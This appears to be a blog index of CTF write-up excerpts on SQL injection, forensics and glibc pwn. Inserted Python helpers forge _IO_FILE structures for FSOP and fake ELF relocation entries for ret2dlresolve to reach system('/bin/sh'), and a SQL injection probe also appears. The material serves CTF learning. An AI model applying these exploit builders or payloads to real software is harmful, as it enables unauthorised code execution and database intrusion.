BUUOJ problem-solving log 9-16

[GeekChallenge 2019] LoveSQL. Try the universal password first and it goes straight in. Then try ?username=1' order by 3#&password=1, but I couldn't get it to work no matter what. Later I found that it was because the # could not be transmitted, so I changed it to %23 (the URL encoding of #). Then try username=1' order by 3%23&password=1 username=1' order b ...

Posted by haolan on Thu, 27 Jan 2022 09:12:25 +0100
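To see why the raw `#` broke the probe, the Python snippet below (added here, not part of the original write-up; the host and path in `BASE` are assumed placeholders) models what the server actually receives. Everything after an unencoded `#` is the URL fragment, which the browser or HTTP client keeps to itself, so the comment marker and the whole `&password=` parameter never reach the SQL query; `%23` survives the trip and is decoded back to `#` on the server side.

```python
"""Model how a raw '#' versus '%23' in a query string reaches the server.

Added example, not from the original write-up. BASE is an assumed placeholder
that mirrors the ?username=...&password=... form of the challenge.
"""
from urllib.parse import parse_qs, urlencode, urlsplit

BASE = "http://challenge.example/index.php"  # assumed placeholder target


def server_view(url: str) -> dict:
    """Return the parameters the server sees for `url`.

    Clients strip everything from the first raw '#' (the fragment) before
    building the request line, so only the query part is ever transmitted.
    parse_qs() percent-decodes the values, as PHP's $_GET does.
    """
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    return {k: v[0] for k, v in params.items()}


def build_probe(username: str, password: str = "1") -> str:
    """Build the probe URL with every parameter percent-encoded.

    urlencode() turns '#' into %23 (and ' into %27), so the comment
    marker arrives intact instead of being dropped as a fragment.
    """
    return BASE + "?" + urlencode({"username": username, "password": password})


if __name__ == "__main__":
    probe = "1' order by 3#"
    print(server_view(BASE + "?username=" + probe + "&password=1"))  # password lost
    print(server_view(build_probe(probe)))                           # both present
```

`build_probe` is the safe way to send any payload that contains `#`, `&`, `+` or `%`: encode each parameter value and let the server decode it, rather than hand-editing the URL.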

GKCTF X DASCTF Emergency Challenge Cup - Maple_root Writeup

Some of the challenge write-ups contain pictures; because CSDN cannot fetch external pictures, they could not be included. If you want the full version, click here to access it. Also: inserting externally linked pictures on CSDN failed again and again. It is really disgusting; we are already considering moving to another site. Participants: b4tteRy, x0r, f1oat ...

Posted by jehardesty on Tue, 25 Jan 2022 19:40:22 +0100

IO_FILE-FSOP,house of orange

FSOP is the abbreviation of File Stream Oriented Programming. All _IO_FILE structures are linked through their _chain field into a linked list maintained by _IO_list_all. The core idea of FSOP is to hijack _IO_list_all, forging the linked list and its _IO_FILE entries. Besides forging the data, the other point is finding a way to trigger execution. FSOP s ...

Posted by purplehaze on Wed, 19 Jan 2022 21:24:46 +0100
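As an added illustration (not code from the original post), the Python helper below lays out the forged `_IO_FILE_plus` and vtable for the pre-2.24 FSOP path on glibc 2.23 x86-64. The field offsets (`_IO_write_base` at 0x20, `_IO_write_ptr` at 0x28, `_chain` at 0x68, `_mode` at 0xc0, vtable pointer at 0xd8) are assumed from that version's `struct _IO_FILE`, and all addresses are placeholders. It also models the per-stream test that `_IO_flush_all_lockp` applies before calling `_IO_OVERFLOW(fp)`, which is what hands control to the forged vtable when `exit()` flushes every stream or when a malloc error's `abort()` path does so on 2.23. The `_flags` field sits at offset 0, so it doubles as the first argument (`fp` itself) of the hijacked call, hence the `/bin/sh` there. From glibc 2.24 on, `IO_validate_vtable` rejects a vtable pointer outside the `__libc_IO_vtables` section, so this plain vtable overwrite no longer works as-is.

```python
"""Forge an _IO_FILE_plus + vtable for the glibc 2.23 x86-64 FSOP path.

Added example, not the original post's code. Offsets are the glibc 2.23
x86-64 struct _IO_FILE layout (assumed here); addresses are placeholders.
"""
import struct

# struct _IO_FILE field offsets, glibc 2.23 x86-64 (assumed).
OFF_FLAGS = 0x00
OFF_WRITE_BASE = 0x20
OFF_WRITE_PTR = 0x28
OFF_CHAIN = 0x68
OFF_MODE = 0xC0
SIZEOF_IO_FILE = 0xD8
OFF_VTABLE = SIZEOF_IO_FILE      # _IO_FILE_plus.vtable follows the file struct
VTABLE_OVERFLOW_SLOT = 3         # _IO_jump_t: dummy, dummy2, finish, overflow, ...


def forge_io_file(vtable_addr: int, chain: int = 0, mode: int = 0,
                  flags: bytes = b"/bin/sh\x00") -> bytes:
    """Return a 0xe0-byte fake _IO_FILE_plus.

    _IO_write_ptr > _IO_write_base and _mode <= 0 satisfy the narrow-stream
    branch of _IO_flush_all_lockp(), so _IO_OVERFLOW(fp, EOF) is invoked
    through the forged vtable. `flags` occupies offset 0, i.e. the start of
    fp itself, which is passed as the first argument to the hijacked slot
    (system(fp) therefore reads "/bin/sh").
    """
    if len(flags) != 8:
        raise ValueError("flags must be exactly 8 bytes")
    buf = bytearray(SIZEOF_IO_FILE + 8)
    buf[OFF_FLAGS:OFF_FLAGS + 8] = flags
    struct.pack_into("<Q", buf, OFF_WRITE_BASE, 0)
    struct.pack_into("<Q", buf, OFF_WRITE_PTR, 1)
    struct.pack_into("<Q", buf, OFF_CHAIN, chain)   # next entry of the _IO_list_all chain
    struct.pack_into("<i", buf, OFF_MODE, mode)
    struct.pack_into("<Q", buf, OFF_VTABLE, vtable_addr)
    return bytes(buf)


def forge_vtable(overflow_target: int, nslots: int = 21) -> bytes:
    """Fake _IO_jump_t (21 slots in 2.23) whose __overflow slot is overflow_target."""
    slots = [0] * nslots
    slots[VTABLE_OVERFLOW_SLOT] = overflow_target
    return struct.pack("<%dQ" % nslots, *slots)


def flush_all_would_call_overflow(fp: bytes) -> bool:
    """Model the per-stream test in glibc 2.23 _IO_flush_all_lockp()."""
    mode, = struct.unpack_from("<i", fp, OFF_MODE)
    wbase, = struct.unpack_from("<Q", fp, OFF_WRITE_BASE)
    wptr, = struct.unpack_from("<Q", fp, OFF_WRITE_PTR)
    return mode <= 0 and wptr > wbase


def resolve_overflow(fp: bytes, memory: dict) -> int:
    """Follow fp->vtable->__overflow as the unpatched 2.23 macro does.

    No IO_validate_vtable() exists yet, so any vtable address is accepted.
    `memory` maps an address to the attacker-controlled bytes stored there.
    """
    vtable, = struct.unpack_from("<Q", fp, OFF_VTABLE)
    target, = struct.unpack_from("<Q", memory[vtable], VTABLE_OVERFLOW_SLOT * 8)
    return target


def walk_chain(list_all: int, memory: dict):
    """Yield (address, bytes) of every fake file reachable from a hijacked
    _IO_list_all through _chain, in the order the flush loop visits them."""
    fp = list_all
    while fp:
        blob = memory[fp]
        yield fp, blob
        fp, = struct.unpack_from("<Q", blob, OFF_CHAIN)
```

In a real exploit `memory` is the target's heap or .bss: the forged file goes wherever the overwritten `_IO_list_all` (or the `_chain` of a real stream) points, and the vtable goes wherever the attacker can write 0x18 + 8 bytes.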

[ctf misc][wp] Write-ups of some memory forensics challenges (including "Bo People's files" from the 2021 Blue Hat Cup North Division)

wp 1. [V&N 2020 open] memory forensics. 1. Find the profile: volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2. List the processes: volatility.exe -f C:\Users\shen\Downloads\mem.raw --profile=Win7SP1x86_23418 pslist > pslist.txt Reading from the back to the front, the last one is DumpIt, the software used to capture the memory image, and ...

Posted by Duell on Mon, 17 Jan 2022 00:52:46 +0100

[ctf wiki pwn] stack overflow: ret2dlresolve series 1 (_dl_runtime_resolve glibc source code analysis and practice)

1 _dl_runtime_resolve entry. _dl_runtime_resolve is implemented in assembly in glibc: the 32-bit entry point is sysdeps/i386/dl-trampoline.S and the 64-bit entry point is sysdeps/x86_64/dl-trampoline.S. This article mainly analyzes the 32-bit source code, version 2.23, from the glibc online source site https://elixir.bootlin.com/glibc/ ...

Posted by tnkannan on Sun, 16 Jan 2022 00:33:45 +0100
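As an added worked example (not code from the CTF Wiki article), the Python below lays out the three fake structures that `_dl_runtime_resolve` hands to `_dl_fixup` on i386 glibc 2.23, and then walks them the way `_dl_fixup` does: `reloc_arg` is the byte offset of an `Elf32_Rel` from `.rel.plt`, `ELF32_R_SYM(r_info)` indexes `.dynsym` in 16-byte `Elf32_Sym` units, and `st_name` is an offset into `.dynstr`. The section addresses, the fake-structure address and the writable write-back slot are placeholders for a hypothetical non-PIE binary. On x86_64 the same idea uses 24-byte `Elf64_Rela` and `Elf64_Sym` entries and an index rather than a byte offset as `reloc_arg`.

```python
"""Fake Elf32_Rel / Elf32_Sym / name for ret2dlresolve, glibc 2.23 i386.

Added example, not from the CTF Wiki article. dynsym, dynstr, rel_plt and
fake_base are placeholder addresses of a hypothetical non-PIE binary.
"""
import struct

R_386_JMP_SLOT = 7
ELF32_REL_SIZE = 8
ELF32_SYM_SIZE = 16
STB_GLOBAL_STT_FUNC = 0x12      # st_info = (STB_GLOBAL << 4) | STT_FUNC


def build_fake_resolve(dynsym: int, dynstr: int, rel_plt: int,
                       fake_base: int, writeback: int, name: bytes):
    """Lay out [Elf32_Rel][pad][Elf32_Sym][name\\0] at fake_base.

    Returns (payload, reloc_arg, layout). `writeback` becomes r_offset, the
    writable slot where _dl_fixup stores the resolved address (l_addr is 0
    for a non-PIE binary). The Elf32_Sym must sit at a 16-byte multiple from
    dynsym because _dl_fixup multiplies the symbol index by sizeof(Elf32_Sym).
    """
    rel_addr = fake_base
    sym_addr = rel_addr + ELF32_REL_SIZE
    sym_addr += (-(sym_addr - dynsym)) % ELF32_SYM_SIZE   # align relative to dynsym
    str_addr = sym_addr + ELF32_SYM_SIZE

    sym_index = (sym_addr - dynsym) // ELF32_SYM_SIZE
    r_info = (sym_index << 8) | R_386_JMP_SLOT
    rel = struct.pack("<II", writeback, r_info)
    # st_other visibility bits must be 0, otherwise _dl_fixup skips the name lookup.
    sym = struct.pack("<IIIBBH", str_addr - dynstr, 0, 0, STB_GLOBAL_STT_FUNC, 0, 0)
    payload = rel + b"\x00" * (sym_addr - rel_addr - ELF32_REL_SIZE) + sym + name + b"\x00"
    layout = {"rel": rel_addr, "sym": sym_addr, "str": str_addr, "sym_index": sym_index}
    return payload, rel_addr - rel_plt, layout


def model_dl_fixup(memory: bytes, mem_base: int, dynsym: int, dynstr: int,
                   rel_plt: int, reloc_arg: int):
    """Read the fake structures the way glibc 2.23 _dl_fixup does.

    Returns (symbol name, r_offset). `memory` is the attacker-written region
    starting at mem_base. The DT_VERSYM step is omitted: in a versioned
    binary _dl_fixup also reads versym[sym_index], so the large index must
    still land in mapped memory.
    """
    def rd(addr: int, n: int) -> bytes:
        off = addr - mem_base
        if off < 0 or off + n > len(memory):
            raise ValueError("read outside the controlled region: %#x" % addr)
        return memory[off:off + n]

    r_offset, r_info = struct.unpack("<II", rd(rel_plt + reloc_arg, ELF32_REL_SIZE))
    if r_info & 0xFF != R_386_JMP_SLOT:
        raise ValueError("ELF32_R_TYPE != R_386_JMP_SLOT")
    sym = rd(dynsym + (r_info >> 8) * ELF32_SYM_SIZE, ELF32_SYM_SIZE)
    st_name, _, _, _, st_other, _ = struct.unpack("<IIIBBH", sym)
    if st_other & 0x3:
        raise ValueError("non-default visibility: symbol treated as already resolved")
    name_off = dynstr + st_name - mem_base
    if not 0 <= name_off < len(memory):
        raise ValueError("name outside the controlled region")
    name = memory[name_off:].split(b"\x00", 1)[0]
    return name, r_offset


if __name__ == "__main__":
    p, arg, lay = build_fake_resolve(0x080481d8, 0x08048278, 0x08048330,
                                     0x0804a024, 0x0804a010, b"system")
    print(hex(arg), {k: hex(v) for k, v in lay.items()})
    print(model_dl_fixup(p, 0x0804a024, 0x080481d8, 0x08048278, 0x08048330, arg))
```

The exploit then writes `payload` to `fake_base` (for instance with a `read` into .bss), and returns into the PLT0 stub with `reloc_arg` and the arguments for the resolved function on the stack; the resolver looks up the name, writes the address to `writeback`, and jumps to it.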

Write-ups for selected CTF pwn challenges

dataleak: the two \x00 bytes can be skipped with \ or /, but each time \ is used, 4 bytes are copied to buf, so the last 3 bytes of data cannot be leaked. Therefore /\ is used to control the leaked string, with garbage data as padding. exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = l ...

Posted by jasongr on Wed, 12 Jan 2022 12:09:40 +0100

Nuclei -- a fast vulnerability scanning tool based on YAML templates

1. Tool introduction 1. Introduction: Nuclei is a customizable, fast vulnerability scanner driven by YAML templates. It is written in Go and is highly configurable, extensible and easy to use. At present the project has 6.6k stars on GitHub. Official website: https://nuclei.projectdiscovery.io Nuclei project addres ...

Posted by leeperryar on Sun, 09 Jan 2022 10:31:51 +0100

ctfshow misc (file structure)

Just writing up notes. MISC24-25: change the picture height to see the flag. MISC26: the challenge hints that the flag is below the picture, but how much of it is there? Change the height to 900 and you can see half of the flag. Here we also need to find the real height of this picture; see the script from an expert found online: import b ...

Posted by nyk on Sun, 02 Jan 2022 22:06:34 +0100
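The height-recovery script the write-up refers to is not reproduced on the page; what follows is an added, self-contained version of the same idea, not the original author's script. It builds a small constructed PNG, shrinks the IHDR height the way the challenge does (leaving the stored CRC alone, which is why viewers complain or show a cropped image), then recovers the real height two independent ways: by brute-forcing the height whose IHDR CRC matches the stored value, and, for the case where the challenge author also recomputed the CRC, from the length of the decompressed IDAT data (8-bit depth assumed). `fix_png` then rewrites the height and CRC so a viewer shows every row.

```python
"""Recover the true height of a PNG whose IHDR height was shrunk.

Added example, not the script the write-up mentions. The PNG used below is
constructed in make_png(); for a real challenge, read the file from disk.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
IHDR_DATA = 16          # offset of the 13 IHDR data bytes in a well-formed file
IHDR_CRC = 29           # offset of the IHDR CRC


def chunk(ctype: bytes, data: bytes) -> bytes:
    """Length + type + data + CRC32 over (type + data), per the PNG spec."""
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))


def make_png(width: int, height: int, rows) -> bytes:
    """Constructed 8-bit greyscale PNG; each row is prefixed with filter byte 0."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + bytes(r) for r in rows)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b"")


def iter_chunks(png: bytes):
    """Yield (type, data) for each chunk after the signature."""
    pos = 8
    while pos + 8 <= len(png):
        length, = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        yield ctype, png[pos + 8:pos + 8 + length]
        pos += 12 + length
        if ctype == b"IEND":
            break


def read_ihdr(png: bytes):
    """Return (width, height, stored_crc) from the IHDR chunk."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG")
    width, height = struct.unpack(">II", png[IHDR_DATA:IHDR_DATA + 8])
    crc, = struct.unpack(">I", png[IHDR_CRC:IHDR_CRC + 4])
    return width, height, crc


def set_height(png: bytes, height: int, fix_crc: bool = False) -> bytes:
    """Rewrite the IHDR height. With fix_crc=False the old CRC is kept,
    which is how the challenge hides the bottom of the image."""
    data = bytearray(png[IHDR_DATA:IHDR_DATA + 13])
    struct.pack_into(">I", data, 4, height)
    crc = png[IHDR_CRC:IHDR_CRC + 4]
    if fix_crc:
        crc = struct.pack(">I", zlib.crc32(b"IHDR" + bytes(data)))
    return png[:IHDR_DATA] + bytes(data) + crc + png[IHDR_CRC + 4:]


def recover_height_by_crc(png: bytes, max_height: int = 5000):
    """Brute-force the height whose IHDR CRC equals the stored CRC."""
    data = bytearray(png[IHDR_DATA:IHDR_DATA + 13])
    _, _, stored = read_ihdr(png)
    for h in range(1, max_height + 1):
        struct.pack_into(">I", data, 4, h)
        if zlib.crc32(b"IHDR" + bytes(data)) == stored:
            return h
    return None


def recover_height_by_idat(png: bytes) -> int:
    """Height from the decompressed IDAT size: each row is 1 filter byte plus
    width * channels bytes (8-bit depth assumed), whatever the header claims."""
    width, _, _ = read_ihdr(png)
    bit_depth, colour_type = png[IHDR_DATA + 8], png[IHDR_DATA + 9]
    if bit_depth != 8:
        raise ValueError("only 8-bit depth handled here")
    channels = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}[colour_type]
    raw = zlib.decompress(b"".join(d for t, d in iter_chunks(png) if t == b"IDAT"))
    return len(raw) // (1 + width * channels)


def fix_png(png: bytes) -> bytes:
    """Restore the CRC-matching height and a valid CRC so viewers show all rows."""
    height = recover_height_by_crc(png)
    if height is None:
        raise ValueError("no height matches the stored CRC; use the IDAT length instead")
    return set_height(png, height, fix_crc=True)
```

When the CRC search finds nothing, the author recomputed the CRC after shrinking the header; `recover_height_by_idat` still works because the pixel data itself was never cropped.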

One Day Weekly CTF: several deserialization exercises

Talking without practising is fake kung fu. Use CTF challenges as after-class exercises to test whether we have really mastered the topic. These are the first two of the four deserialization problems from One Day Weekly CTF (exhausted; I'll rest and do the other two later). EZ-unserialize: it is no exaggeration to say that I spent a long time on it. It is a common question type, but ...

Posted by radar on Sun, 02 Jan 2022 08:51:57 +0100

2021 DASCTF Practical Elite Summer Camp and DASCTF July X CBCTF: old_thing

Partial RELRO. After getting in, you need to log in first. The user name is admin, but the password is unknown. We are given a reversing binary; after some research it turns out to be md5. Why md5? First, let's look at what md5 is. First of all, no matter how long the input is, the output md5 value is always 16 bytes. Also, md5 has something called standa ...

Posted by fishown on Mon, 27 Dec 2021 10:30:35 +0100